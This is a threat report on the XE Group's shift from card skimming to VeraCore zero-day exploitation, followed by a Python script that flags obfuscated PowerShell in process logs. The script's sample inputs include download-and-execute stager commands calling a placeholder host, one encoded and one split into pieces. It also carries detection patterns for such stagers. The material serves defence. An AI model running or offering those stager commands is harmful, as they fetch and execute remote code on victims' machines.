From Credit Card Skimming to Exploiting Zero-Days

Threat Report: XE Group Evolution

Introduction

The XE Group, a cybercriminal organization active since 2013, has significantly evolved its tactics, techniques, and procedures (TTPs). Initially focused on web vulnerabilities and supply chain attacks, the group has shifted towards targeted information theft in the manufacturing and distribution sectors.

Threat Overview

  • Evolution of TTPs: XE Group has demonstrated increased sophistication by exploiting previously undocumented vulnerabilities in VeraCore software, including an SQL injection flaw and an upload validation vulnerability.

  • Long-term Access: The group maintains long-term access to compromised systems, as evidenced by its reactivation of a webshell planted years earlier.

  • Recent Activities: Their recent activities involve exfiltrating configuration files, performing network reconnaissance, and deploying a Remote Access Trojan (RAT) using obfuscated PowerShell commands.

Implications

The evolution of XE Group highlights the group's adaptability and the growing threat it poses to supply chain security. Organizations in the manufacturing and distribution sectors should be particularly vigilant.

Recommendations

  1. Patch Management: Ensure timely patching of vulnerabilities in VeraCore software and other systems to prevent exploitation.

  2. Monitor Webshells: Regularly scan and monitor for webshells, especially those planted long ago that may be reactivated.

  3. Strengthen Access Controls: Implement strong access controls to limit unauthorized access and maintain audit trails.

  4. Network Segmentation: Segment networks to contain potential breaches and reduce the risk of lateral movement.

  5. PowerShell Script Scanning: Employ tools to scan for obfuscated PowerShell commands used in malware delivery.

  6. Threat Intelligence: Stay informed about emerging threats like XE Group through threat intelligence feeds.
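Recommendation 5 calls for tooling that spots obfuscated PowerShell. The following is an added example written for this summary, not code from the report or from ESSGroup: it scores process command lines by decoding `-EncodedCommand` payloads (base64 of UTF-16LE text) and undoing simple string splitting before matching download-and-execute keywords. The sample command lines are constructed, and the keyword list and scoring threshold are assumptions for illustration.

```python
import base64
import binascii
import re
# Constructed sample process-creation command lines (not taken from the report).
def _encode(cmd: str) -> str:
    # -EncodedCommand takes base64 of the UTF-16LE encoding of the script text.
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\inventory.ps1",
    "powershell.exe -NoP -W Hidden -Enc " + _encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    "powershell.exe -w hidden -c \"$s='Ne'+'t.We'+'bClient'; "
    "IEX ((New-Object $s).DownloadString('http://example.invalid/b'))\"",
    "powershell.exe Get-ChildItem C:\\Users",
]
# PowerShell accepts unambiguous prefixes of -EncodedCommand; common ones listed.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Tokens typical of a download-and-execute stager (assumed list), checked after normalisation.
INDICATORS = {
    "iex": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.IGNORECASE),
    "webclient": re.compile(r"net\.webclient", re.IGNORECASE),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no-profile": re.compile(r"-nop\b|-noprofile", re.IGNORECASE),
}
CONCAT = re.compile(r"'\s*\+\s*'")  # 'Ne'+'t' is the same string as 'Net'

def decode_encoded_command(b64: str):
    """Plaintext of an -EncodedCommand payload, or None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline: str) -> dict:
    """Score one command line; decodes -Enc payloads and undoes string splitting."""
    result = {"cmdline": cmdline, "encoded": False, "decoded": None, "indicators": []}
    text = cmdline
    m = ENC_FLAG.search(cmdline)
    if m and (decoded := decode_encoded_command(m.group(1))) is not None:
        result["encoded"], result["decoded"] = True, decoded
        text = cmdline + " " + decoded  # match keywords in the plaintext too
    normalized = CONCAT.sub("", text)   # 'Ne'+'t.We'+'bClient' -> 'Net.WebClient'
    if normalized != text:
        result["indicators"].append("string-concat")
    result["indicators"] += [n for n, p in INDICATORS.items() if p.search(normalized)]
    # Threshold is an assumption: an encoded payload weighs as two indicators.
    result["score"] = len(result["indicators"]) + (2 if result["encoded"] else 0)
    result["suspicious"] = result["score"] >= 3
    return result
```

Run `analyze_command_line` over process-creation logs (Sysmon Event ID 1 or Security 4688 command lines) and review anything flagged; the decoded plaintext in the result is what an analyst reads first.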
